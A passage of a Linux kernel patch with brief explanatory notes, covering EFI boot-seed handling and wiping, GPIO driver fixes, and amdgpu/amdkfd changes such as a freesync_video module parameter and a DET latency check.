+ 		seed = early_memremap(efi_rng_seed, sizeof(*seed));
+ 		if (seed != NULL) {
+-			size = min(seed->size, EFI_RANDOM_SEED_SIZE);
++			size = min_t(u32, seed->size, SZ_1K); // sanity check
+ 			early_memunmap(seed, sizeof(*seed));
+ 		} else {
+ 			pr_err("Could not map UEFI random seed!\n");
+@@ -620,8 +620,8 @@ int __init efi_config_parse_tables(const efi_config_table_t *config_tables,
+ 			seed = early_memremap(efi_rng_seed,
+ 					      sizeof(*seed) + size);
+ 			if (seed != NULL) {
+-				pr_notice("seeding entropy pool\n");
+ 				add_bootloader_randomness(seed->bits, size);
++				memzero_explicit(seed->bits, size);
+ 				early_memunmap(seed, sizeof(*seed) + size);
+ 			} else {
+ 				pr_err("Could not map UEFI random seed!\n");
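The efi.c hunk caps the recorded seed size at SZ_1K before trusting it and wipes the seed buffer once its entropy has been credited. The wipe matters because an optimizing compiler may drop a plain memset of memory that is never read again; a rough userspace equivalent of memzero_explicit(), assuming a GCC/Clang-style compiler barrier:

#include <string.h>

/* A userspace approximation of memzero_explicit(): the empty asm with a
 * "memory" clobber keeps the compiler from eliding the memset as a dead
 * store once the seed buffer is no longer read. */
static void wipe(void *p, size_t n)
{
	memset(p, 0, n);
	__asm__ __volatile__("" : : "r" (p) : "memory");
}

int main(void)
{
	char seed[32] = "not really random";

	/* ... mix the seed into the entropy pool, then wipe the copy ... */
	wipe(seed, sizeof(seed));
	return 0;
}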
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index eb03d5a9aac88..900df67a20785 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -882,6 +882,8 @@ efi_status_t efi_get_random_bytes(unsigned long size, u8 *out);
+ efi_status_t efi_random_alloc(unsigned long size, unsigned long align,
+ 			      unsigned long *addr, unsigned long random_seed);
+ 
++efi_status_t efi_random_get_seed(void);
++
+ efi_status_t check_platform_features(void);
+ 
+ void *get_efi_config_table(efi_guid_t guid);
+diff --git a/drivers/firmware/efi/libstub/random.c b/drivers/firmware/efi/libstub/random.c
+index 33ab567695951..f85d2c0668777 100644
+--- a/drivers/firmware/efi/libstub/random.c
++++ b/drivers/firmware/efi/libstub/random.c
+@@ -67,27 +67,43 @@ efi_status_t efi_random_get_seed(void)
+ 	efi_guid_t rng_proto = EFI_RNG_PROTOCOL_GUID;
+ 	efi_guid_t rng_algo_raw = EFI_RNG_ALGORITHM_RAW;
+ 	efi_guid_t rng_table_guid = LINUX_EFI_RANDOM_SEED_TABLE_GUID;
++	struct linux_efi_random_seed *prev_seed, *seed = NULL;
++	int prev_seed_size = 0, seed_size = EFI_RANDOM_SEED_SIZE;
+ 	efi_rng_protocol_t *rng = NULL;
+-	struct linux_efi_random_seed *seed = NULL;
+ 	efi_status_t status;
+ 
+ 	status = efi_bs_call(locate_protocol, &rng_proto, NULL, (void **)&rng);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
+ 
++	/*
++	 * Check whether a seed was provided by a prior boot stage. In that
++	 * case, instead of overwriting it, let's create a new buffer that can
++	 * hold both, and concatenate the existing and the new seeds.
++	 * Note that we should read the seed size with caution, in case the
++	 * table got corrupted in memory somehow.
++	 */
++	prev_seed = get_efi_config_table(LINUX_EFI_RANDOM_SEED_TABLE_GUID);
++	if (prev_seed && prev_seed->size <= 512U) {
++		prev_seed_size = prev_seed->size;
++		seed_size += prev_seed_size;
++	}
++
+ 	/*
+ 	 * Use EFI_ACPI_RECLAIM_MEMORY here so that it is guaranteed that the
+ 	 * allocation will survive a kexec reboot (although we refresh the seed
+ 	 * beforehand)
+ 	 */
+ 	status = efi_bs_call(allocate_pool, EFI_ACPI_RECLAIM_MEMORY,
+-			     sizeof(*seed) + EFI_RANDOM_SEED_SIZE,
++			     struct_size(seed, bits, seed_size),
+ 			     (void **)&seed);
+-	if (status != EFI_SUCCESS)
+-		return status;
++	if (status != EFI_SUCCESS) {
++		efi_warn("Failed to allocate memory for RNG seed.\n");
++		goto err_warn;
++	}
+ 
+ 	status = efi_call_proto(rng, get_rng, &rng_algo_raw,
+-				 EFI_RANDOM_SEED_SIZE, seed->bits);
++				EFI_RANDOM_SEED_SIZE, seed->bits);
+ 
+ 	if (status == EFI_UNSUPPORTED)
+ 		/*
+@@ -100,14 +116,28 @@ efi_status_t efi_random_get_seed(void)
+ 	if (status != EFI_SUCCESS)
+ 		goto err_freepool;
+ 
+-	seed->size = EFI_RANDOM_SEED_SIZE;
++	seed->size = seed_size;
++	if (prev_seed_size)
++		memcpy(seed->bits + EFI_RANDOM_SEED_SIZE, prev_seed->bits,
++		       prev_seed_size);
++
+ 	status = efi_bs_call(install_configuration_table, &rng_table_guid, seed);
+ 	if (status != EFI_SUCCESS)
+ 		goto err_freepool;
+ 
++	if (prev_seed_size) {
++		/* wipe and free the old seed if we managed to install the new one */
++		memzero_explicit(prev_seed->bits, prev_seed_size);
++		efi_bs_call(free_pool, prev_seed);
++	}
+ 	return EFI_SUCCESS;
+ 
+ err_freepool:
++	memzero_explicit(seed, struct_size(seed, bits, seed_size));
+ 	efi_bs_call(free_pool, seed);
++	efi_warn("Failed to obtain seed from EFI_RNG_PROTOCOL\n");
++err_warn:
++	if (prev_seed)
++		efi_warn("Retaining bootloader-supplied seed only");
+ 	return status;
+ }
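The libstub change above concatenates the RNG-protocol output with a seed left behind by a prior boot stage, trusting the recorded size only up to a 512-byte cap and sizing the allocation with struct_size(). A sketch of the layout math under an assumed 32-byte EFI_RANDOM_SEED_SIZE:

#include <stdint.h>
#include <stdio.h>

#define EFI_RANDOM_SEED_SIZE 32U	/* assumed size for this sketch */

struct seed_table {
	uint32_t size;
	uint8_t  bits[];	/* flexible array, as in linux_efi_random_seed */
};

/* The fresh RNG-protocol output occupies bits[0..EFI_RANDOM_SEED_SIZE),
 * and the prior-stage seed, if its recorded size passes the 512-byte
 * sanity cap, is appended right after it. */
static size_t concat_alloc_size(uint32_t prev_size, uint32_t *total)
{
	*total = EFI_RANDOM_SEED_SIZE;
	if (prev_size <= 512U)
		*total += prev_size;
	/* equivalent of struct_size(seed, bits, *total) */
	return sizeof(struct seed_table) + (size_t)*total;
}

int main(void)
{
	uint32_t total;
	size_t bytes = concat_alloc_size(64, &total);

	printf("seed payload %u bytes, allocation %zu bytes\n", total, bytes);
	return 0;
}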
+diff --git a/drivers/gpio/gpio-pca953x.c b/drivers/gpio/gpio-pca953x.c
+index ebe1943b85dd9..bf21803a00363 100644
+--- a/drivers/gpio/gpio-pca953x.c
++++ b/drivers/gpio/gpio-pca953x.c
+@@ -473,6 +473,9 @@ static u8 pcal6534_recalc_addr(struct pca953x_chip *chip, int reg, int off)
+ 	case PCAL6524_DEBOUNCE:
+ 		pinctrl = ((reg & PCAL_PINCTRL_MASK) >> 1) + 0x1c;
+ 		break;
++	default:
++		pinctrl = 0;
++		break;
+ 	}
+ 
+ 	return pinctrl + addr + (off / BANK_SZ);
+diff --git a/drivers/gpio/gpio-sifive.c b/drivers/gpio/gpio-sifive.c
+index 238f3210970cf..bc5660f61c570 100644
+--- a/drivers/gpio/gpio-sifive.c
++++ b/drivers/gpio/gpio-sifive.c
+@@ -215,6 +215,7 @@ static int sifive_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 	parent = irq_find_host(irq_parent);
++	of_node_put(irq_parent);
+ 	if (!parent) {
+ 		dev_err(dev, "no IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 2eca58220550e..5f1d0990c6f34 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -196,6 +196,7 @@ extern int amdgpu_emu_mode;
+ extern uint amdgpu_smu_memory_pool_size;
+ extern int amdgpu_smu_pptable_id;
+ extern uint amdgpu_dc_feature_mask;
++extern uint amdgpu_freesync_vid_mode;
+ extern uint amdgpu_dc_debug_mask;
+ extern uint amdgpu_dc_visual_confirm;
+ extern uint amdgpu_dm_abm_level;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 647220a8762dc..30f145dc8724e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -265,8 +265,10 @@ int amdgpu_amdkfd_get_pcie_bandwidth_mbytes(struct amdgpu_device *adev, bool is_
+ 	(&((struct amdgpu_fpriv *)					\
+ 		((struct drm_file *)(drm_priv))->driver_priv)->vm)
+ 
++int amdgpu_amdkfd_gpuvm_set_vm_pasid(struct amdgpu_device *adev,
++				     struct file *filp, u32 pasid);
+ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+-					struct file *filp, u32 pasid,
++					struct file *filp,
+ 					void **process_info,
+ 					struct dma_fence **ef);
+ void amdgpu_amdkfd_gpuvm_release_process_vm(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index fe87b3402f06a..29f045079a3e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1473,10 +1473,9 @@ static void amdgpu_amdkfd_gpuvm_unpin_bo(struct amdgpu_bo *bo)
+ 	amdgpu_bo_unreserve(bo);
+ }
+ 
+-int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+-					   struct file *filp, u32 pasid,
+-					   void **process_info,
+-					   struct dma_fence **ef)
++int amdgpu_amdkfd_gpuvm_set_vm_pasid(struct amdgpu_device *adev,
++				     struct file *filp, u32 pasid)
++
+ {
+ 	struct amdgpu_fpriv *drv_priv;
+ 	struct amdgpu_vm *avm;
+@@ -1487,10 +1486,6 @@ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+ 		return ret;
+ 	avm = &drv_priv->vm;
+ 
+-	/* Already a compute VM? */
+-	if (avm->process_info)
+-		return -EINVAL;
+-
+ 	/* Free the original amdgpu allocated pasid,
+ 	 * will be replaced with kfd allocated pasid.
+ 	 */
+@@ -1499,14 +1494,36 @@ int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
+ 		amdgpu_vm_set_pasid(adev, avm, 0);
+ 	}
+ 
+-	/* Convert VM into a compute VM */
+-	ret = amdgpu_vm_make_compute(adev, avm);
++	ret = amdgpu_vm_set_pasid(adev, avm, pasid);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = amdgpu_vm_set_pasid(adev, avm, pasid);
++	return 0;
++}
++
++int amdgpu_amdkfd_gpuvm_acquire_process_vm(struct amdgpu_device *adev,
++					   struct file *filp,
++					   void **process_info,
++					   struct dma_fence **ef)
++{
++	struct amdgpu_fpriv *drv_priv;
++	struct amdgpu_vm *avm;
++	int ret;
++
++	ret = amdgpu_file_to_fpriv(filp, &drv_priv);
+ 	if (ret)
+ 		return ret;
++	avm = &drv_priv->vm;
++
++	/* Already a compute VM? */
++	if (avm->process_info)
++		return -EINVAL;
++
++	/* Convert VM into a compute VM */
++	ret = amdgpu_vm_make_compute(adev, avm);
++	if (ret)
++		return ret;
++
+ 	/* Initialize KFD part of the VM and process info */
+ 	ret = init_kfd_vm(avm, process_info, ef);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index d8dfbb9b735dc..b59466972ed7a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -180,6 +180,7 @@ int amdgpu_mes_kiq;
+ int amdgpu_noretry = -1;
+ int amdgpu_force_asic_type = -1;
+ int amdgpu_tmz = -1; /* auto */
++uint amdgpu_freesync_vid_mode;
+ int amdgpu_reset_method = -1; /* auto */
+ int amdgpu_num_kcq = -1;
+ int amdgpu_smartshift_bias;
+@@ -877,6 +878,32 @@ module_param_named(backlight, amdgpu_backlight, bint, 0444);
+ MODULE_PARM_DESC(tmz, "Enable TMZ feature (-1 = auto (default), 0 = off, 1 = on)");
+ module_param_named(tmz, amdgpu_tmz, int, 0444);
+ 
++/**
++ * DOC: freesync_video (uint)
++ * Enable the optimization that adjusts front porch timing to achieve a
++ * seamless mode change experience when setting a FreeSync-supported mode
++ * for which a full modeset is not needed.
++ *
++ * When users enable this feature, the Display Core adds a set of modes
++ * derived from the base FreeSync video mode to the corresponding connector's
++ * mode list, based on commonly used refresh rates and the VRR range of the
++ * connected display. From the userspace perspective, changes between
++ * different refresh rates at the same resolution then appear seamless.
++ * Additionally, userspace applications such as video playback can read this
++ * mode list and change the refresh rate based on the video frame rate.
++ * Finally, userspace can also derive an appropriate mode for a particular
++ * refresh rate based on the FreeSync mode and add it to the connector's
++ * mode list.
++ *
++ * Note: This is an experimental feature.
++ *
++ * The default value: 0 (off).
++ */
++MODULE_PARM_DESC(
++	freesync_video,
++	"Enable freesync modesetting optimization feature (0 = off (default), 1 = on)");
++module_param_named(freesync_video, amdgpu_freesync_vid_mode, uint, 0444);
++
+ /**
+  * DOC: reset_method (int)
+  * GPU reset method (-1 = auto (default), 0 = legacy, 1 = mode0, 2 = mode1, 3 = mode2, 4 = baco)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 3df13d841e4d5..3be3cba3a16db 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -446,27 +446,24 @@ static bool amdgpu_bo_validate_size(struct amdgpu_device *adev,
+ 
+ 	/*
+ 	 * If GTT is part of requested domains the check must succeed to
+-	 * allow fall back to GTT
++	 * allow fall back to GTT.
+ 	 */
+ 	if (domain & AMDGPU_GEM_DOMAIN_GTT) {
+ 		man = ttm_manager_type(&adev->mman.bdev, TTM_PL_TT);
+ 
+-		if (size < man->size)
++		if (man && size < man->size)
+ 			return true;
+-		else
+-			goto fail;
+-	}
+-
+-	if (domain & AMDGPU_GEM_DOMAIN_VRAM) {
++		else if (!man)
++			WARN_ON_ONCE("GTT domain requested but GTT mem manager uninitialized");
++		goto fail;
++	} else if (domain & AMDGPU_GEM_DOMAIN_VRAM) {
+ 		man = ttm_manager_type(&adev->mman.bdev, TTM_PL_VRAM);
+ 
+-		if (size < man->size)
++		if (man && size < man->size)
+ 			return true;
+-		else
+-			goto fail;
++		goto fail;
+ 	}
+ 
+-
+ 	/* TODO add more domains checks, such as AMDGPU_GEM_DOMAIN_CPU */
+ 	return true;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 951b636772484..dd351105c1bcf 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -689,13 +689,13 @@ void kfd_process_destroy_wq(void)
+ }
+ 
+ static void kfd_process_free_gpuvm(struct kgd_mem *mem,
+-			struct kfd_process_device *pdd, void *kptr)
++			struct kfd_process_device *pdd, void **kptr)
+ {
+ 	struct kfd_dev *dev = pdd->dev;
+ 
+-	if (kptr) {
++	if (kptr && *kptr) {
+ 		amdgpu_amdkfd_gpuvm_unmap_gtt_bo_from_kernel(mem);
+-		kptr = NULL;
++		*kptr = NULL;
+ 	}
+ 
+ 	amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(dev->adev, mem, pdd->drm_priv);
+@@ -795,7 +795,7 @@ static void kfd_process_device_destroy_ib_mem(struct kfd_process_device *pdd)
+ 	if (!qpd->ib_kaddr || !qpd->ib_base)
+ 		return;
+ 
+-	kfd_process_free_gpuvm(qpd->ib_mem, pdd, qpd->ib_kaddr);
++	kfd_process_free_gpuvm(qpd->ib_mem, pdd, &qpd->ib_kaddr);
+ }
+ 
+ struct kfd_process *kfd_create_process(struct file *filep)
+@@ -1277,7 +1277,7 @@ static void kfd_process_device_destroy_cwsr_dgpu(struct kfd_process_device *pdd)
+ 	if (!dev->cwsr_enabled || !qpd->cwsr_kaddr || !qpd->cwsr_base)
+ 		return;
+ 
+-	kfd_process_free_gpuvm(qpd->cwsr_mem, pdd, qpd->cwsr_kaddr);
++	kfd_process_free_gpuvm(qpd->cwsr_mem, pdd, &qpd->cwsr_kaddr);
+ }
+ 
+ void kfd_process_set_trap_handler(struct qcm_process_device *qpd,
+@@ -1576,9 +1576,9 @@ int kfd_process_device_init_vm(struct kfd_process_device *pdd,
+ 	p = pdd->process;
+ 	dev = pdd->dev;
+ 
+-	ret = amdgpu_amdkfd_gpuvm_acquire_process_vm(
+-		dev->adev, drm_file, p->pasid,
+-		&p->kgd_process_info, &p->ef);
++	ret = amdgpu_amdkfd_gpuvm_acquire_process_vm(dev->adev, drm_file,
++						     &p->kgd_process_info,
++						     &p->ef);
+ 	if (ret) {
+ 		pr_err("Failed to create process VM object\n");
+ 		return ret;
+@@ -1593,13 +1593,19 @@ int kfd_process_device_init_vm(struct kfd_process_device *pdd,
+ 	if (ret)
+ 		goto err_init_cwsr;
+ 
++	ret = amdgpu_amdkfd_gpuvm_set_vm_pasid(dev->adev, drm_file, p->pasid);
++	if (ret)
++		goto err_set_pasid;
++
+ 	pdd->drm_file = drm_file;
+ 
+ 	return 0;
+ 
++err_set_pasid:
++	kfd_process_device_destroy_cwsr_dgpu(pdd);
+ err_init_cwsr:
++	kfd_process_device_destroy_ib_mem(pdd);
+ err_reserve_ib_mem:
+-	kfd_process_device_free_bos(pdd);
+ 	pdd->drm_priv = NULL;
+ 
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 3f0a4a415907d..35a9b702508af 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -801,7 +801,7 @@ static int kfd_build_sysfs_node_entry(struct kfd_topology_device *dev,
+ 
+ 		p2plink->attr.name = "properties";
+ 		p2plink->attr.mode = KFD_SYSFS_FILE_MODE;
+-		sysfs_attr_init(&iolink->attr);
++		sysfs_attr_init(&p2plink->attr);
+ 		ret = sysfs_create_file(p2plink->kobj, &p2plink->attr);
+ 		if (ret < 0)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index c2c26fbea5129..dacad8b85963c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4372,6 +4372,10 @@ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ 		amdgpu_set_panel_orientation(&aconnector->base);
+ 	}
+ 
++	/* If we didn't find a panel, notify the acpi video detection */
++	if (dm->adev->flags & AMD_IS_APU && dm->num_of_edps == 0)
++		acpi_video_report_nolcd();
++
+ 	/* Software is initialized. Now we can register interrupt handlers. */
+ 	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+@@ -5803,7 +5807,8 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+-		recalculate_timing = is_freesync_video_mode(&mode, aconnector);
++		recalculate_timing = amdgpu_freesync_vid_mode &&
++				 is_freesync_video_mode(&mode, aconnector);
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
+@@ -6888,7 +6893,7 @@ static void amdgpu_dm_connector_add_freesync_modes(struct drm_connector *connect
+ 	struct amdgpu_dm_connector *amdgpu_dm_connector =
+ 		to_amdgpu_dm_connector(connector);
+ 
+-	if (!edid)
++	if (!(amdgpu_freesync_vid_mode && edid))
+ 		return;
+ 
+ 	if (amdgpu_dm_connector->max_vfreq - amdgpu_dm_connector->min_vfreq > 10)
+@@ -8749,7 +8754,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		 * TODO: Refactor this function to allow this check to work
+ 		 * in all conditions.
+ 		 */
+-		if (dm_new_crtc_state->stream &&
++		if (amdgpu_freesync_vid_mode &&
++		    dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state, old_crtc_state))
+ 			goto skip_modeset;
+ 
+@@ -8784,7 +8790,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		if (!dm_old_crtc_state->stream)
+ 			goto skip_modeset;
+ 
+-		if (dm_new_crtc_state->stream &&
++		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+@@ -8796,7 +8802,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+ 
+ 			goto skip_modeset;
+-		} else if (aconnector &&
++		} else if (amdgpu_freesync_vid_mode && aconnector &&
+ 			   is_freesync_video_mode(&new_crtc_state->mode,
+ 						  aconnector)) {
+ 			struct drm_display_mode *high_mode;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 9afd9ba23fb2a..820042f6aaca5 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -670,6 +670,25 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 		v->cursor_bw[k] = mode_lib->vba.NumberOfCursors[k] * mode_lib->vba.CursorWidth[k][0] * mode_lib->vba.CursorBPP[k][0] / 8 / (mode_lib->vba.HTotal[k] / mode_lib->vba.PixelClock[k]) * mode_lib->vba.VRatio[k];
+ 	}
+ 
++	v->NotEnoughDETSwathFillLatencyHiding = dml32_CalculateDETSwathFillLatencyHiding(
++						mode_lib->vba.NumberOfActiveSurfaces,
++						mode_lib->vba.ReturnBW,
++						v->UrgentLatency,
++						mode_lib->vba.SwathHeightY,
++						mode_lib->vba.SwathHeightC,
++						v->swath_width_luma_ub,
++						v->swath_width_chroma_ub,
++						v->BytePerPixelDETY,
++						v->BytePerPixelDETC,
++						mode_lib->vba.DETBufferSizeY,
++						mode_lib->vba.DETBufferSizeC,
++						mode_lib->vba.DPPPerPlane,
++						mode_lib->vba.HTotal,
++						mode_lib->vba.PixelClock,
++						mode_lib->vba.VRatio,
++						mode_lib->vba.VRatioChroma,
++						mode_lib->vba.UsesMALLForPStateChange);
++
+ 	for (k = 0; k < mode_lib->vba.NumberOfActiveSurfaces; ++k) {
+ 		v->MaxVStartupLines[k] = ((mode_lib->vba.Interlace[k] &&
+ 				!mode_lib->vba.ProgressiveToInterlaceUnitInOPP) ?
+@@ -1664,6 +1683,7 @@ static void mode_support_configuration(struct vba_vars_st *v,
+ 				&& mode_lib->vba.PTEBufferSizeNotExceeded[i][j] == true
+ 				&& mode_lib->vba.DCCMetaBufferSizeNotExceeded[i][j] == true
+ 				&& mode_lib->vba.NonsupportedDSCInputBPC == false
++				&& mode_lib->vba.NotEnoughDETSwathFillLatencyHidingPerState[i][j] == false
+ 				&& !mode_lib->vba.ExceededMALLSize
+ 				&& ((mode_lib->vba.HostVMEnable == false
+ 				&& !mode_lib->vba.ImmediateFlipRequiredFinal)
+@@ -3158,6 +3178,25 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.UrgentBurstFactorChroma,
+ 					mode_lib->vba.UrgentBurstFactorCursor);
+ 
++			mode_lib->vba.NotEnoughDETSwathFillLatencyHidingPerState[i][j] = dml32_CalculateDETSwathFillLatencyHiding(
++					mode_lib->vba.NumberOfActiveSurfaces,
++					mode_lib->vba.ReturnBWPerState[i][j],
++					mode_lib->vba.UrgLatency[i],
++					mode_lib->vba.SwathHeightYThisState,
++					mode_lib->vba.SwathHeightCThisState,
++					mode_lib->vba.swath_width_luma_ub_this_state,
++					mode_lib->vba.swath_width_chroma_ub_this_state,
++					mode_lib->vba.BytePerPixelInDETY,
++					mode_lib->vba.BytePerPixelInDETC,
++					mode_lib->vba.DETBufferSizeYThisState,
++					mode_lib->vba.DETBufferSizeCThisState,
++					mode_lib->vba.NoOfDPPThisState,
++					mode_lib->vba.HTotal,
++					mode_lib->vba.PixelClock,
++					mode_lib->vba.VRatio,
++					mode_lib->vba.VRatioChroma,
++					mode_lib->vba.UsesMALLForPStateChange);
++
+ 			v->dummy_vars.dml32_ModeSupportAndSystemConfigurationFull.VMDataOnlyReturnBWPerState = dml32_get_return_bw_mbps_vm_only(&mode_lib->vba.soc, i,
+ 					mode_lib->vba.DCFCLKState[i][j], mode_lib->vba.FabricClockPerState[i],
+ 					mode_lib->vba.DRAMSpeedPerState[i]);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index debe46b24a3e1..b53feeaf5cf11 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -6228,3 +6228,72 @@ void dml32_CalculateImmediateFlipBandwithSupport(unsigned int NumberOfActiveSurf
+ 	*ImmediateFlipBandwidthSupport = (*TotalBandwidth <= ReturnBW);
+ 	*FractionOfUrgentBandwidth = *TotalBandwidth / ReturnBW;
+ }
++
++bool dml32_CalculateDETSwathFillLatencyHiding(unsigned int NumberOfActiveSurfaces,
++		double ReturnBW,
++		double UrgentLatency,
++		unsigned int SwathHeightY[],
++		unsigned int SwathHeightC[],
++		unsigned int SwathWidthY[],
++		unsigned int SwathWidthC[],
++		double  BytePerPixelInDETY[],
++		double  BytePerPixelInDETC[],
++		unsigned int    DETBufferSizeY[],
++		unsigned int    DETBufferSizeC[],
++		unsigned int	NumOfDPP[],
++		unsigned int	HTotal[],
++		double	PixelClock[],
++		double	VRatioY[],
++		double	VRatioC[],
++		enum dm_use_mall_for_pstate_change_mode UsesMALLForPStateChange[DC__NUM_DPP__MAX])
++{
++	int k;
++	double SwathSizeAllSurfaces = 0;
++	double SwathSizeAllSurfacesInFetchTimeUs;
++	double DETSwathLatencyHidingUs;
++	double DETSwathLatencyHidingYUs;
++	double DETSwathLatencyHidingCUs;
++	double SwathSizePerSurfaceY[DC__NUM_DPP__MAX];
++	double SwathSizePerSurfaceC[DC__NUM_DPP__MAX];
++	bool NotEnoughDETSwathFillLatencyHiding = false;
++
++	/* calculate sum of single swath size for all pipes in bytes */
++	for (k = 0; k < NumberOfActiveSurfaces; k++) {
++		SwathSizePerSurfaceY[k] = SwathHeightY[k] * SwathWidthY[k] * BytePerPixelInDETY[k] * NumOfDPP[k];
++
++		if (SwathHeightC[k] != 0)
++			SwathSizePerSurfaceC[k] = SwathHeightC[k] * SwathWidthC[k] * BytePerPixelInDETC[k] * NumOfDPP[k];
++		else
++			SwathSizePerSurfaceC[k] = 0;
++
++		SwathSizeAllSurfaces += SwathSizePerSurfaceY[k] + SwathSizePerSurfaceC[k];
++	}
++
++	SwathSizeAllSurfacesInFetchTimeUs = SwathSizeAllSurfaces / ReturnBW + UrgentLatency;
++
++	/* ensure all DET - 1 swath can hide a fetch for all surfaces */
++	for (k = 0; k < NumberOfActiveSurfaces; k++) {
++		double LineTime = HTotal[k] / PixelClock[k];
++
++		/* only care if surface is not phantom */
++		if (UsesMALLForPStateChange[k] != dm_use_mall_pstate_change_phantom_pipe) {
++			DETSwathLatencyHidingYUs = (dml_floor(DETBufferSizeY[k] / BytePerPixelInDETY[k] / SwathWidthY[k], 1.0) - SwathHeightY[k]) / VRatioY[k] * LineTime;
++
++			if (SwathHeightC[k] != 0) {
++				DETSwathLatencyHidingCUs = (dml_floor(DETBufferSizeC[k] / BytePerPixelInDETC[k] / SwathWidthC[k], 1.0) - SwathHeightC[k]) / VRatioC[k] * LineTime;
++
++				DETSwathLatencyHidingUs = dml_min(DETSwathLatencyHidingYUs, DETSwathLatencyHidingCUs);
++			} else {
++				DETSwathLatencyHidingUs = DETSwathLatencyHidingYUs;
++			}
++
++			/* DET must be able to hide time to fetch 1 swath for each surface */
++			if (DETSwathLatencyHidingUs < SwathSizeAllSurfacesInFetchTimeUs) {
++				NotEnoughDETSwathFillLatencyHiding = true;
++				break;
++			}
++		}
++	}
++
++	return NotEnoughDETSwathFillLatencyHiding;
++}
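dml32_CalculateDETSwathFillLatencyHiding() boils down to one comparison per non-phantom surface: the time the DET can hide (its capacity in lines minus one in-flight swath, drained at the vertical ratio) must cover the time to fetch one swath for all surfaces plus the urgent latency. A single-surface worked example; every number below is made up for illustration:

#include <math.h>
#include <stdio.h>

int main(void)
{
	double ReturnBW      = 512000.0;	/* bytes per microsecond */
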